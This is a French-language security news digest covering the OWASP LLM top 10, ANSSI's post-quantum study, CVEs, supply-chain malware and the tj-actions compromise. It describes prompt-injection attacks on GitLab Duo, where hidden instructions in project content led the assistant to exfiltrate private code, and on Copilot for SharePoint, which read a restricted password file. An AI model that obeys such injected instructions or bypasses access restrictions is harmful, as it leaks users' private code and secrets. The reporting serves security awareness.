Récemment, l'OWASP publiait son top 10 des vulnérabilités LLM et GenAI. Si le Vibe Coding est encouragé par les éditeurs et comme tendance IA du moment, malheureusement, les vulnérabilités sont nombreuses et le code généré par les agents et LLM ne doit pas être utilisé aveuglement. LegitSecurity démontre que le code généré par GitLab Duo pose de réels problèmes. Les vulnérabilités sont là et impactent directement la sécurité. 

"C'est exactement ce que nous avons découvert : une vulnérabilité par un prompt injection qui permet aux attaquants de voler le code source de projets privés, de manipuler les suggestions de code affichées à d'autres utilisateurs et même d'exfiltrer des vulnérabilités zero-day confidentielles et non divulguées, le tout via GitLab Duo Chat" indique les chercheurs. 

Les chercheurs se sont inspirés de l'OWASP pour tester GitLab Duo et voir comment maninuper la GenIA. Une des étapes est d'utiliser le prompt et manoeuver la GenIA : "pourrions-nous intégrer des instructions cachées dans différentes parties d'un projet GitLab tout en influençant le comportement de Duo ?" Les tests sont faits en utilisateurs invités. Toutes les demandes sont passées ! "Parce que pour générer des réponses utiles, Duo analyse l'intégralité du contexte de la page, y compris les commentaires, les descriptions et le code source, ce qui la rend vulnérable aux instructions injectées cachées n'importe où dans ce contexte." explique l'étude.

Découvrir l'ensemble des manipulations : https://www.legitsecurity.com/blog/remote-prompt-injection-in-gitlab-duo

GitLab a été mis au courant des vulnérabilités. "Après avoir révélé le problème le 12 février 2025, GitLab a confirmé la vulnérabilité d'injection HTML et a également reconnu l'injection d'invite comme un problème de sécurité. GitLab a confirmé que les deux vecteurs avaient été corrigés." Des patchs ont été déployés par combler les failles. 

En conclusion : "Cette vulnérabilité met en évidence le caractère à double tranchant des assistants IA comme GitLab Duo : lorsqu'ils sont profondément intégrés aux workflows de développement, ils héritent non seulement du contexte, mais aussi des risques. En intégrant des instructions cachées dans un contenu de projet apparemment inoffensif, nous avons pu manipuler le comportement de Duo, exfiltrer du code source privé et démontrer comment les réponses de l'IA peuvent être exploitées à des fins imprévues et néfastes."

Parmi les tendances de cybersécurité, le post-quantique agite beaucoup les experts et les éditeurs de solutions, du moins nous le supposons. L'ANSSI regarde naturellement ce qu'il se passe sur la cryptographie post-quantique (ou PQC) et sa prise en compte par les entreprises et les institutions. L'agence française vient de publier une étude réalisée depuis 2023 et le résultat n'est pas brillant.

" La transition post-quantique concerne en premier lieu la cryptographie asymétrique, notamment pour les usages en confidentialité et échanges de clé pour se prémunir contre des attaques rétroactives. Les primitives cryptographiques actuellement déployées (« pré-quantiques ») sont bien maîtrisées par les développeurs en cybersécurité et il en existe de nombreuses implémentations efficaces et robustes, sous forme de bibliothèques commerciales ou libres. La situation des futurs standards post-quantiques est différente. En effet, seuls quelques spécialistes du domaine maîtrisent complètement ces primitives. Des implémentations efficaces et durcies – qu’elles soient logicielles ou sur plateforme matérielle – vont demander beaucoup de temps et d’efforts. De même, les mécanismes et protocoles qui mettent en oeuvre ces nouvelles primitives sont récents et ne jouissent pas du même niveau d’assurance et de confiance dans leur niveau de sécurité. Ce constat global s’applique autant aux algorithmes d’établissement de clé qu’aux signatures numériques." introduit l'ANSSI.

Les primitves post-quantique seraient maîtrisées par les développeurs en cybersécurité. Nous ne serons pas aussi affirmatifs que l'ANSSI. Non, de nombreux experts et développeurs en sécurité ne connaissent pas ou maîtrisent mal ces concepts. Déjà le terme même de post-quantique reste souvent nébuleux. De même, "De même, les mécanismes et protocoles qui mettent en oeuvre ces nouvelles primitives sont récents et ne jouissent pas du même niveau d’assurance et de confiance dans leur niveau de sécurité. Ce constat global s’applique autant aux algorithmes d’établissement de clé qu’aux signatures numériques.". Oui le post-quantique est relativement récent mais nous disposons dores et déjà d'une base solide : la PQC poussée par l'agence américaine NIST. Ces "standards" sont aujourd'hui ceux qui sont les plus utilisés par les éditeurs de solution de sécurité. Et les Etats-Unis poussent au déploiement du PQC. Sur ce point, la France est en retard et les seuls "standards" réellement utilisés sont ceux du NIST. 

"Plus de la moitié des bénéficiaires de l’ANSSI interrogés semble dès aujourd’hui être à risque vis-à-vis de la menace de l’ordinateur quantique. En cause : leur recours à des pratiques vulnérables aux attaques rétroactives, telles que l’usage de VPN pour transmettre des informations sensibles dont la confidentialité doit être assurée pour une durée supérieure à 10 ans, ou l’exploitation de certificats dont la durée de vie excède également 10 ans. La grande majorité des bénéficiaires a connaissance de cette menace quantique d’un point de vue théorique ; mais l’impact concret de celle-ci sur leurs systèmes d’information ne leur est pas connu." poursuit l'agence.

L'ANSSI pointe un problème crucial : la compréhension de la PQC et les risques liés. Une attaque quantique sur la cryptographie actuelle peut théoriquement cassée toutes les clés. C'est peut-être largement théorique, le risque est réel. L'étude déplore une absence de plan de transition vers le post-quantique. 

"L’enquête fait très nettement ressortir un fort besoin d’accompagnement de ces entités par des prestataires externes, tant pour les travaux préparatoires d’élaboration d’un plan de transition (analyse de risque quantique, identification des cas d’usages prioritaires, inventaire des actifs cryptographiques, classification des données) que pour accompagner la transition elle-même (formation, conseil, transformation, suivi des fournisseurs, mise à jour des applications métier, etc.)." explique l'agence. 

Les équipes de cybersécurité manqueraient de budget et de compétences. Mais les répondants à l'étude attendent un soutien actif de l'ANSSI pour cette transition PQC. Sous-entendu, on rejette la responsabilité du PQC sur l'ANSSI. Or, l'agence rappelle le rôle des équipes et de la direction générale et qu'elle n'est pas là pour faire le travail des équipes et des directions générales.

L'étude pointe 4 raisons sur l'absence de la PQC :

- une mauvaise compréhension des enjeux et les risques réels de la PQC

- un manque financier et de compétences

- un manque d'offres réelles de PQC pour entamer (ou planifier) la transition PQC

- pas d'obligation réglementaire : l'ANSSI précise que la réglementation est malheureusement parfois la seule contrainte efficace ! Bref : on ne bouge pas et on verra bien sauf si on est obligé de le faire !

L'étude conclut sans détour : "Face à ces observations, l’ANSSI rappelle l’importance de démarrer sans tarder les actions préparatoires à la transition post-quantique, dans tout type d’organisations. Il est important que chaque organisation évalue son niveau de risque réel vis-à-vis de la menace quantique et élabore son plan de transition. Certaines actions devront être mises en oeuvre sans délai et d’autres, progressivement, sur les années à venir."

Source : Etude de l'ANSSI sur la transition post-quantique, mars 2025 (avec mise à jour de mai 2025)

Comment rendre plus autonome l'AppSec ? Checkmarx veut pousser les agents IA au coeur de l'AppSec. « La plateforme AppSec Checkmarx One  a récemment dépassé les 500 milliards de lignes de code analysées chaque mois. Cette échelle sans précédent, et les enseignements qui en découlent, constituent le socle de notre vision de l’IA agentique — une approche qui repose sur des volumes massifs de données pour entraîner efficacement les grands modèles de langage (LLM) et renforcer leur pertinence dans des contextes applicatifs réels», a déclaré Sandeep Johri, CEO de Checkmarx. « L’Agentic AI Summit consacre plus de dix ans d’innovation vers une sécurité applicative pilotée par l’intelligence artificielle. »

L'éditeur présentera son approche durant un webinaire le 24 juin prochain. Le Sommet aura lieu le 24 juin 2025 à 13h00, heure de la côte Est (Eastern Time) soit à 19h00, heure de Paris (CEST) en présence de : 

• Sandeep Johri, CEO, Checkmarx 
• Jonathan Rende, CPO, Checkmarx 
• Katie Norton, Research Manager, DevSecOps et Supply Chain Security, IDC 
• Steve Yegge, Software Engineer, Sourcegraph et co-auteur du “Vibe Coding”
• Ori Bendet, VP of Product Management, Checkmarx 
• Andrew Zigler, défenseur des développeurs (Developer Advocate) chez LinearB et animateur du podcast Dev Interrupted

Pour participer à ce webinaire : https://www.checkmarx.ai/?utm_source=press_release&utm_medium=referral&utm_campaign=agentic_ai

Pen Test Partners, spécialisé dans le pentest, a voulu voir si Copilot pouvait accéder et lire des fichiers sensibles à accès restreint. Le test fut mené avec Copilot pour Sharepoint. Les testeurs ont pu lire un fichier protégé contenant des mots de passe alors que Sharepoint n'avait pas autorisé l'accès. Copilot a bypassé la restriction ! L'agent IT a pu afficher tout le contenu normalement inaccessible... 

Cela prouve donc des trous dans la sécurité à cause de Copilot sur Windows. Le PoC se limite à SharePoint mais l'équipe de pentesteurs a découvert d'autres possibilités qui n'ont pas été publiées pour le moment. 

Démonstration complète : https://www.pentestpartners.com/security-blog/exploiting-copilot-ai-for-sharepoint/

Suite à la conférence Pwn2Own, Mozilla déploie en urgence une mise à jour de sécurité : la 138.0.4. Elle fixe 2 vulnérabilités jugées sévères et exploitées durant la conférence de hacking : les CVE-2025-4918 et 4919. 

Ces deux vulnérabilités permettent de lire et écrire des objets JavaScript, provoquant une corruption de mémoires, donner accès à des données de l'utilisateur ou encore permettre d'exécuter du code malveillant. 

Note d'information : https://blog.mozilla.org/security/2025/05/17/firefox-security-response-to-pwn2own-2025/

Dans près d’une entreprise logicielle sur deux, la responsabilité du suivi de la sécurité n’est plus du ressort de la RSSI. C'est l'étonnante conclusion du rapport A CISO's guide to steering AppSec in the Age of DevSecOps publié par Checkmarx.

"À mesure que les applications gagnent en complexité et en évolutivité, sous l’effet combiné de l’intelligence artificielle, des micro-services et des architectures hybrides, les équipes d’ingénierie assument une responsabilité croissante dans la livraison de solutions à la fois sécurisées et évolutives. Dans un contexte de cycles de développement toujours plus courts et de lignes de code en constante expansion, les décisions stratégiques en matière d’AppSec, tout comme les budgets qui les accompagnent, sont de plus en plus transférés aux développeurs. Objectif : intégrer la sécurité dès les premières étapes du cycle de développement de manière plus efficace." explique l'annonce du rapport.

Le Secure by Design est un débat depuis 30 ans. Oui, il faut que la sécurité se fasse dès la conception et dans le code. Les équipes doivent s'assurer d'un code de qualité, respecter les règles de codage. Rappelons qu'un bug, ou une faille, découvert seulement en production ou en phase finale de développement, coûte cher à corriger car il faut lancer une itération. Plus le problème est identifié tôt, plus il est "rapide" à fixer. Le secure by design, ou l'AppSec au sens large, permet de réduire la surface d'attaque potentielle et réduire l'impact des TOP 10 de l'OWASP. 

Mais attention, les équipes sécurité, et donc le RSSI, ne doivent pas se décharger du AppSec et de tout faire peser sur les développeurs. Ce serait une erreur. Il ne faut pas oublier que l'AppSec dépasse le rôle du développeur et concerne l'ensemble du cycle de l'application. 

• 49 % des RSSI interrogés déclarent que les acheteurs prennent régulièrement en compte la sécurité des applications dans leurs décisions d'achat.
• 24 % indiquent que la sécurité applicative est toujours un critère déterminant dans ces choix. 
• Cette tendance est particulièrement marquée en Europe, où 58 % des répondants affirment que la sécurité est systématiquement prise en compte, contre 33 % en Asie-Pacifique et seulement 8 % en Amérique du Nord.

Il serait temps que la sécurité par défaut soit un critère mais malheureusement, les délais toujours plus serrés nuient à l'AppSec car encore trop souvent, les développeurs doivent travailler dans l'urgence ou avec des spécifications floues ou trop complexes. D'autre part, avec des codes générés par l'IA dont la sécurité et la qualité ne sont pas forcément assurées, on introduit une nouvelle incertitude dans l'AppSec.

L'étude de Checkmarx met également en lumière une décentralisation croissante des décisions en matière de sécurité, avec un rôle renforcé des équipes de développement, tant sur le plan opérationnel que budgétaire. Dans les entreprises développant des ogiciels, la responsabilité de la sécurité est désormais partagée :

• 50 % continuent de l’attribuer aux RSSI,
• 43 % la transfèrent aux équipes de développement.
• 56 % des organisations indiquent que la majorité de leurs équipes de développement sont pleinement intégrées aux programmes AppSec

Oui, il était temps que les développeurs soient pleinement intégrés au AppSec mais, comme nous l'avons dit plus haut, il ne faut pas que le RSSI s'en lave les mains : "ah non, c'est pas moi, c'est lui". « À mesure que la responsabilité de la sécurité se déplace vers les équipes de développement, les budgets suivent la même voie. Les RSSI doivent désormais exercer leur influence non pas en imposant des barrières, mais en définissant un cadre clair : protéger sans freiner l’innovation. » poursuit Jonathan Rende.

Pour faire du secure by design, de l'AppSec au niveau du code, il faut sensibiliser, former, établir des règles claires, laisser le temps nécessaire.

Si 62 % des RSSI déclarent présenter des indicateurs AppSec à leur conseil d’administration, la majorité d’entre eux se contentent de rapporter le volume de vulnérabilités, sans les relier à des enjeux métier concrets. Seuls 25 % parviennent à établir un lien clair entre ces risques techniques et leurs conséquences sur la réputation de la marque, la conformité réglementaire ou la performance économique. Ce décalage illustre l’urgence, pour les RSSI, de repositionner la sécurité dans une logique de gestion des risques business, condition indispensable pour obtenir un engagement durable de la Direction.

Le gouvernement fédéral américain poursuit les coupes dans les budgets des agences officielles. C'est au tour de l'agence de la sécurité des infrastructures et de la cybersécurité d'être confrontée aux menaces et aux coupes budgétaires. La CISA pourrait perdre 491 millions $.

La CISA est accusé par Trump de contribuer à la censure et d'abandonner sa mission première. La menace est pour le moment de pure forme car le congrès américain doit valider cette réduction qui représente 17 % du budget de fonctionnement de l'agence. Un des reproches concerne la sécurité des élections et le président évoque les résultats de 2020 et la victoire de Biden. La maison blanche veut que la CISA se recentre sur les missions premières et qu'elle se préoccupe plus de censurer que de protéger les intérêts du pays. 

La CISA emploie 3 600 personnes et possède un budget de 3 milliards $. 

L'OWASP propose un top 10 des risques et vulnérabilités sur les LLM et les genIA en général. L'OWASP confirme que l'IA est loin d'être sécurisée, au contraire, les risques de sécurité se multiplient si l'implémentation est mal faite ou l'usage mal cadré. 

1 - injection : le prompt injection est un classique. Un prompt altère le fonctionnement prévu de la genIA et/ du LLM. Et peu à peu on influence son fonctionnement et on amène à générer des données sensibles ou des exemples d'attaque ou des réponses non prévues. Voir : jailbreaking LLM

2 - des données sensibles sont accessibles : trop d'entreprises laissent des données sensibles / privées sur les LLM. Ces données peuvent être accessibles. Il ne faut pas autoriser les LLM / genIA à accéder à ces données sauf dans un cadre strictement interne et déconnecté de l'extérieur

3 - les chaînes LLM constituent un risque et une surface d'attaque potentielle. Risque de corrompre les modèles ou les données, utiliser des API, des services non sécurisés

4 - données et modèles empoisonnés : cela signifie que les données ne sont pas qualifiés ou corrompues. Si ces données ne sont pas bonnes, le LLM sera biaisé et générera de fausses informations et de mauvaises réponses = déviance du modèle. Il faut vérifier l'origine des données et la conformité de celles-ci avec ce que l'on veut générer. Il faut aussi que le LLM soit bien défini et cadré.

5 - La gestion incorrecte des sorties fait spécifiquement référence à une validation et une gestion insuffisantes des sorties générées par le LLM. Et cela peut se propager et corrompre d'autres systèmes

6 - Trop d'agent IA peut nuire à la sécurité et au bon comportement. Avec les agents on peut perdre le contrôle de ce qu'il se passe et favoriser l'hallunication. La qualité médiocre d'un LLM est exploitée. L'agent ou la genIA ne fait pas la différence entre un bon LLM et un mauvais LLM

7 - Fuite au niveau du prompt : il ne faut pas que des identifications, des secrets ou données sensibles se retrouvent dans les réponses du prompt. Il doit "comprendre" ce qui peut être généré ou non. 

8 - Une mauvaise intégration peut être une source de vulnérabilités. Cela peut être accentué en utilisant du RAG.

9 - désinformation : finalement c'est une combinaison des précédents points

10 - consommation illimitée : on n'y pense pas forcément car un déni de services peut impacter un service IA, un genIA en le saturant de prompts qui va alors peser sur l'infrastructure. Cela peut être possible avec des prompts nombreux et longs, des requêtes envoyées en grande quantité dans un délai très court, des API mal limitées pouvant faire exploser les ressources, etc. 

L'éditeur Armis lance Armis Vulnerability Intelligence. Cette nouvelle base de données a l'ambition d'agréger les vulnérabilités exploitées, les menaces et des compléments d'informations liées à ces vulnérabilités. Cette base est communautaire et gratuite. 

Le projet est alimenté par les données d'Armis Labs et des diverses solutions de l'éditeur. "La base de données Armis Vulnerability Intelligence est une ressource clé, pensée par la communauté pour la communauté de la cybersécurité. Elle transforme les données de vulnérabilités en informations concrètes, permettant aux entreprises de mieux se protéger contre les cybermenaces grâce à une adaptation plus rapide et des prises de décisions éclairées." explique Nadir Izrael, CTO et cofondateur d'Armis.

Pour Armis, il s'agit d'aider les entreprises à réagir plus vite et si possible avant une attaque : 58 % des grandes entreprises réagissent après l'attaque et les conséquences de celle-çi. Par ailleurs, près d'un quart (22 %) des décideurs informatiques reconnaissent l'absence d’une évaluation continue des vulnérabilités comme une faiblesse dans leurs dispositifs de sécurité, et nombreux sont ceux qui s’appuient encore sur des feuilles Excel pour suivre les vulnérabilités et les résultats de sécurité. Ces lacunes doivent ainsi être comblées en amont pour éviter les impacts négatifs.

Site : https://cve.armis.com/

JFrog a publié rson rapport Software Supply Chain State of the Union 2025. Il dresse un panorama de la sécurité sur les plateformes de supply chain logiciels. Cette dernière étude confirme les problèmes de sécurité autour de l'IA et des modèles LLM qui ne cessent de progresser. 

"De nombreuses organisations adoptent avec enthousiasme les modèles ML publics pour stimuler l'innovation rapide, démontrant un engagement fort à exploiter l'IA pour la croissance. Cependant, plus d'un tiers d'entre elles comptent encore sur des efforts manuels pour gérer l'accès aux modèles sécurisés et approuvés, ce qui peut conduire à des négligences potentielles," a déclaré Yoav Landman, CTO et co-fondateur de JFrog. "L'adoption de l'IA va croître encore plus rapidement. Par conséquent, pour que les organisations prospèrent à l'ère de l'IA, elles doivent automatiser leurs chaînes d'outils et leurs processus de gouvernance avec des solutions prêtes pour l'IA, garantissant qu'elles restent à la fois sécurisées et agiles tout en maximisant leur potentiel d'innovation."

Principaux éléments du rapport :

• une combinaison de vulnérabilités de sécurité menace la chaîne d'approvisionnement logicielle : on peut citer les multiples CVE, les packages malveillants (qui se multiplient partout), les expositions de secrets, et les mauvaises configurations/erreurs humaines. Par exemple, l’équipe de recherche en sécurité de JFrog a détecté 25 229 secrets/tokens exposés dans des registres publics (augmentation de 64 % par rapport à l'année précédente). La complexité croissante des menaces de sécurité logicielle rend plus difficile le maintien d’une sécurité cohérente dans la chaîne d'approvisionnement logicielle.
• La prolifération et les attaques des modèles AI/ML augmentent : En 2024, plus de 1 million de nouveaux modèles ML ont été ajoutés sur Hugging Face, accompagnés d'une augmentation de 6,5x des modèles malveillants, ce qui indique que les modèles AI et ML deviennent de plus en plus une cible privilégiée pour les acteurs malveillants.
• La gouvernance manuelle des modèles ML augmente les risques : la majorité des entreprises (94 %) utilisent des listes certifiées pour gouverner l'utilisation des artefacts ML, mais plus d'un tiers (37 %) de ces entreprises s'appuient sur des efforts manuels pour créer et maintenir leurs listes de modèles ML approuvés. Cette dépendance excessive à la validation manuelle crée de l'incertitude sur l'exactitude et la cohérence de la sécurité des modèles ML.

• Le manque de scans de sécurité est un véritable angle mort : la situation est à la fois alarmante et incomphérensible ! Seulement 43 % des professions de l'IT disent que leur entreprises réalisent des scans de sécurité à la fois sur le code et les binaires. Il y a un mieux par rapport à 2024 mais ce n'est pas glorieux pour les entreprises

• Les vulnérabilités critiques continuent d'augmenter : En 2024, les chercheurs en sécurité ont divulgué plus de 33 000 nouveaux CVE, soit une augmentation de 27 % par rapport à 2023, dépassant le taux de croissance de 24,5 % des nouveaux packages logiciels. Cette tendance soulève des inquiétudes car le nombre croissant de CVE augmente la complexité et la pression sur les développeurs et les équipes de sécurité, pouvant freiner l'innovation. Par ailleurs, l’équipe de sécurité de JFrog a constaté que seulement 12 % des CVE de haut niveau notées "critiques" (CVSS 9.0-10.0) par les organisations gouvernementales justifient le niveau de sévérité critique qui leur a été attribué, car elles sont susceptibles d'être exploitées par des attaquants₁. Ce modèle est préoccupant en raison d'une méthodologie de notation centralisée et inchangée au fil du temps, ce qui augmente le risque de faux positifs dans les évaluations et contribue à la "fatigue de vulnérabilité" chez les développeurs.

  Le manque de visibilité sur l'origine des codes utilisés est toujours d'actualité (le vibe coding va contribuer à faire exploser ce problème) et constitue une réelle menace pour l'intégrité des apps. Tout comme, il est totalement anormal de télécharger des extensions et des templates pour son IDE sans un minimum de vérification. 

  Les hacks et vulnérabilités concernent les OS, les langages, les frameworks, les codes ! 

Level 2 Jeff a proposé un défi sur sa chaîne YouTube : dépixelisation des images d'une vidéo. A la clé : 50 $. L'image était fortement pixelisée rendant toute identification impossible. Sauf qu'il n'a fallu que quelques heures pour réussir le défi ! KokuToru a publié sur son GitHub les méthodes utilisés. Ce qui est intéressant est l'approche différente (et complémentaire) entre les deux solutions du hacker. La première est une "attaque" par force brutale. Le plus difficile est de pouvir s'appuyer sur une image stable visible dans la vidéo du défi.

Dans la solution 1, le développeur utilise du TensorFlow pour extraire les pixels et toutes les données possibles de l'image puis de agréger pour tenter de reconstituer l'image. Il fallait extraire les frames avec ffmpeg puis les traiter par un templare. Cet test 1 repose sur 56 frames. Le résultat est loin d'être parfait mais avec un peu de concentration on peut lire certaines informations (l'image contenu le contenu d'un SSD).

La solution 2 se révèle bien plus puissante. Elle mêle algo, ffmpeg et GIMP. Comme le dit KokuToru, le test 2 s'appuie sur les principes du test 1 en trouvant une position dans la fenêtre automatiquement pour améliorer le traitement et avoir plus de données. Cette approche a permis d'extraire 200 frames. 

Et là, le résultat est beaucoup plus précis et surtout la dépixelisation permet une lecture facile du contenu !

Il a fallu à peine 4 heures pour aboutir à ces résultats.

Comme le dit Jeff, il aurait fallu un supercalculateur il y a quelques années. Aujourd'hui, entre l'IA et les outils disponibles, il est possible d'aller beaucoup plus vite même quand il s'agit d'une vidéo floutée. Pour Jeff, le fait d'avoir déplacé la fenêtre contenant les données à lire a permis de générer des données et des frames supplémentaires. Il ne pense plus appliquer un simple flou ou un effet de pixelisation à l'avenir. 

"La morale de l'histoire, c'est que si vous ne voulez pas que les gens lisent des données censurées… ne les publiez pas en ligne." conclut Jeff. 

Post de Jeff sur le travail de KokuToru : https://www.jeffgeerling.com/blog/2025/its-easier-ever-de-censor-videos

Les solutions de KokuToru : https://github.com/KoKuToru/de-pixelate_gaV-O6NPWrI?tab=readme-ov-file

GitLab annonce que son service Duo est disponible avec Amazon Q. Cette solution intégrée est proposée en bundle aux clients GitLab Ultimate sur AWS. Cette version embarque directement les agents Amazon Q Developer au sein de la plateforme GitLab.

Pour GitLab, cette intégration répond à plusieurs défis :

●    Le développement autonome de nouvelles fonctionnalités
Transformation automatique des idées de fonctionnalités en merge requests prêtes à être intégrées, en quelques minutes : analyse des besoins, planification, et génération de merge requests conformes aux standards internes.

●    La modernisation des bases de code existantes
Automatisation de la refonte de bases de code Java 8 et 11 : création d’un plan de mise à niveau complet, génération de merge requests documentées avec traçabilité.

●    La remédiation des vulnérabilités de sécurité
Explication des failles, analyse des causes racines, et remédiation en un clic via des suggestions de modifications de code.

●    L’amélioration de l’assurance qualité
Génération automatique de revues de code pour améliorer la couverture de tests et la cohérence de qualité tout en réduisant la charge manuelle.

●    L’optimisation des revues de code
Accélération des cycles de relecture grâce à des retours en ligne, des suggestions d’amélioration et des alertes sur les performances et la sécurité.

NVIDIA avait corrigée la vulnérabilité CVE-2024-0132 avec un joli score de 9 dans le niveau critique. La correction se révèle incomplète et permet, en cas d'exploitation réussie, de mettre les données en danger. Cette faille permet d'avoir un accès non autorisée d'un conteneur. La vulnérabilité avait été dévoilée en septembre 2024 et rapidement patchée. Trend Micro a vérifié la résolution et conclut que le fix proposé n'est pas complet et qu'une faille est toujours présente. 

Elle concerne Docker sur Linux et permet de faire un déni de service. La faille est numérotée CVE-2025-23359. Plus grave, cette faille peut exposer les infrastructures et les données. Trend Micro a publié une analyse de la faille et propose même un exemple d'utilisation. 

En attendant une correction complète, Trend Micro conseille :

- réduire les accès API Docker

- désactiver tout ce qui n'est pas essentiel

- mettre en place un contrôle d'accès plus strict

- faire un audit des conteneurs et des interactions avec le système

Pour en savoir plus : https://www.trendmicro.com/en_us/research/25/d/incomplete-nvidia-patch.html

OpenSSL passe en version 3.5.0. Cette version corrige quelques bugs mais la liste est courte. Mais attention : cette version apporte des changements qui peuvent casser les déploiements actuels. Réaliser un PoC avec de mettre à place.

Quelques changements : 

- pour les apps req, cms et smime, le projet utilise aes-256-cbc à la place de des-ede3-cbc

- les listes groupes TLS incluent les groupes hybrides PQC KME. Attention : les groupes non utilisés seront retirés de la liste par défaut

- support du serveur side QUIC

- nouveaux algos PQC

- toutes les fonctions BIO_meth_get_*() sont dépréciées

Note de version : https://github.com/openssl/openssl/releases/tag/openssl-3.5.0

WinRAR subit de nouveau une importante faille de sécurité. Référence : CVE-2025-31334. Elle concerne TOUTES LES VERSIONS de l'utilitaire, sauf la plus récente ! La faille permet de bypasser la sécurité Mark to the Web et son avertissement et de pouvoir exécuter un code malveillant quand l'utilisateur ouvre une archive, un fichier contenu dans l'archive sur son poste Windows. Et ainsi, un code illicite peut s'exécuter en arrière-plan.

La fonction Mark to the Web permet d'avertir si un fichier provenant du web semble suspect ou non. Si Mark to the Web considère le fichier suspecté, un avertissement sera généré quand on essaie de l'ouvrir et le fichier est marqué. La faille permet de bypasser ce warning. 

Mettez à jour votre WinRAR avec la version la plus récente.

Mauvaises périodes pour les gestionnaires de paquets. NPM subit une nouvelle attaque de paquets malicieux . Les chercheurs de Reversing Labs ont découvert le problème. Ils ont découverts que les 2 paquets s'appellent ethers-providers2 et "ethers-providerz. Le premier ressemble à un paquet ssh2 mais le fichier install diffère et introduit du code malveillant. Le second permet d'installer un cheval de Troie. 

Une fois installée, l'attaque déploie une porte dérobée sur le poste de travail et pointe vers une IP malicieuse. 

Analyse complète : https://www.reversinglabs.com/blog/malicious-npm-patch-delivers-reverse-shell

Début mars, HP déploie un firmware pour certaines imprimantes laser (gamme LaserJet). Jusque-là, tout est normal. Mais rapidement, les problèmes s'accumulent pour des utilisateurs : le firmware brique littéralement l'imprimante et ne reconnait pas les cartouches d'origine HP ! Et impossible d'utiliser des cartouches non officielles. Le firmware 20250209 est la version problématique. 

Selon The Register et Arstechnica, les messages d'erreur 11 se sont multiplient. HP a répondu à The Register : "nous sommes informés d'un problème de firmware affectant un nombre limité d'imprimantes LaserJet 200. Nos équipes travaillent à trouver une solution". Ce n'est pas la première qu'un problème de firmware touche des imprimantes chez HP. Le 18 mars, HP a précisé à The Register qu'une mise à jour de la mise à jour a été déployée pour les LaserJet 200. Et l'assistant HP est là pour aider les utilisateurs bloqués à mettre à jour l'imprimante briquée. L'opération n'est pas simple à réaliser, nous avons une expérience similaire avec une OfficeJet Pro... Il a fallu plusieurs jours pour tenter une mise à jour manuelle...

Une étude Checkmarx / Censuswide révèle que les développeurs interrogés disent être meilleurs en sécurité, avec une compétence plus grande. Mais il y a énorme mais qui pondère ce sentiment d'amélioration : le manque de temps pour être efficace et réellement appliquer le secure by design.

L'étude DevSecOps Evolution : from DevEx to DevSecOps analyse les pratiques des équipes de développement dans les grandes entreprises. L’étude révèle que, malgré une certaine progression, les équipes de développement et de sécurité peinent à aligner flux de travail et métriques associées. Bref : il y a un peu de mieux mais le fossé reste colossal. 

Quelques chiffres qui font réflêchir : 

• 21 % des développeurs interrogés déclarent que la sécurité est leur priorité absolue lors du codage
• 99,6 % des participants ont eu accès à des formations dédiées à la sécurité, 90 % d'entre eux estimant l’efficacité de ces dernières de moyenne ou élevée
•  41,53 % déclarent comprendre les tickets de vulnérabilité qu'ils reçoivent, ainsi que la manière dont ces vulnérabilités se manifestent lors de l'exécution, entre 41 et 60 % du temps
• 72 % des développeurs consacrent plus de 17 heures par semaine à des tâches liées à la sécurité et un sur quatre y consacre plus de 25 heures

Checkmarx préconise 4 étapes pour faire du DevSecOps :

• Étape 0 - Sécurité réactive : l’AppSec est « intégré » au développement, créant un goulot d'étranglement et agissant comme un frein au déploiement.
• Étape 1 - Axé sur la sécurité : l’AppSec détecte et transmet les vulnérabilités aux développeurs, qui sont bombardés d'alertes sans recevoir aucune aide à la remédiation.
• Étape 2 – Axé sur le DevEx : les outils sont directement intégrés à l'environnement de développement (IDE), ce qui permet aux développeurs de corriger les vulnérabilités à l'aide de conseils de remédiation sans perturber leur flux de travail.
• Étape 3 – DevSecOps mature : la culture DevSecOps est désormais solidement ancrée. Les équipes de sécurité et de développement partagent une vision commune en matière de politiques, de gouvernance et de collaboration. La formation, dispensée directement dans l’environnement de développement IDE au moment opportun, assure une montée en compétences ciblée. Par ailleurs, des objectifs clairs et des indicateurs de performance harmonisés permettent de suivre efficacement les progrès.

Un autre élément de l'étude pointe que 28 % du temps consacré à la sécurité sont pour la résolution et la fixation des failles. 45 % du temps est dédié à faire du code sécurisé (reste à savoir où et comment). 

« En 2024, le DevSecOps a connu une phase de transition en France, portée par une prise de conscience croissante et des efforts pour intégrer la sécurité à chaque étape du développement. Pourtant, des défis persistent, notamment le manque de ressources, des budgets contraints et des organisations encore cloisonnées. Si des avancées ont été réalisées, 2025 sera une année clé pour structurer et généraliser durablement le DevSecOps en France face à un cadre réglementaire de plus en plus exigeant. » conclut Fabien Petiau, Country Manager France de Checkmarx.

Pour aller plus loin :

Hors série sécurité & hacking édition 2025 : https://www.programmez.com/magazine/programmez-hors-serie-16-pdf

DevCon sécurité de novembre 2024 : 

Des extensions malicieuses ne sont pas rares sur Visual Studio et Visual Studio Code. Deux extensions douteuses sont apparues ces derniers semaines. Elles ont pour extension .ahban.shiba et ahban.cyhelloworld. Heureusement, les téléchargements ont été très limités avant que Microsoft ne les retire. Visiblement, ces extensions ont réussi à passer les procédures de review avant publication sur la marketplace. Plus étonnant encore, le premier malware semble dater d'octobre 2024 et le second de février 2025. 

ReversingLabs a mis en évidence la présence de commandes Powershell pour charger et exécuter des scripts PowerShell pour installer un ransomware et se connecter à un site illicite. Ces ransomwares ne semblent pas terminer mais peuvent crypter des fichiers et lancer une alerte à l'utilisateur. 

Microsoft a rapidement ordonné le retrait des extensions. 

GitHub subit une vilaine attaque : Actions a été compromis via tj-actions/changed-files. Il permet de détecter les changements sur les fichiers des référentiels. Cette fonction est naturellement très utilisée. Un hacker a réussi à y injecter un code malveillant qui c'est ensuite diffusé dans plus de 23 000 projets. 

L'attaque remonte au 14 mars et même peut-être dès le 11-12 mars selon Sysdig. L'attaque consiste à une altération du code pour pouvoir injecter un code malveillant pour récupérer les secrets et les données des projets. Il s'agit d'une fonction Node en base64. Elle contient des instructions Python. Les secrets incluent les clés d'API, les tokens d'accès. Selon Sysdig, d'autres codes malveillants ont été répérés dans d'autres projets. A l'heure actuelle, l'identité de l'attaquant n'est pas connue ni la motivation de l'attaque. L'attaque consiste à cibler le Personal Access Token (PAT). GitHub cherche à savoir comment une telle compromission a été possible. 

L'auteur de tj-actions/changed-files a confirmé que les mots de passe du compte bot ont été modifiés et que les permissions ont été abaissées pour réduire les risques. Envisagez une alternative à tj-actions/changed-files. 

Cette attaque est référencée : CVE-2025-30066

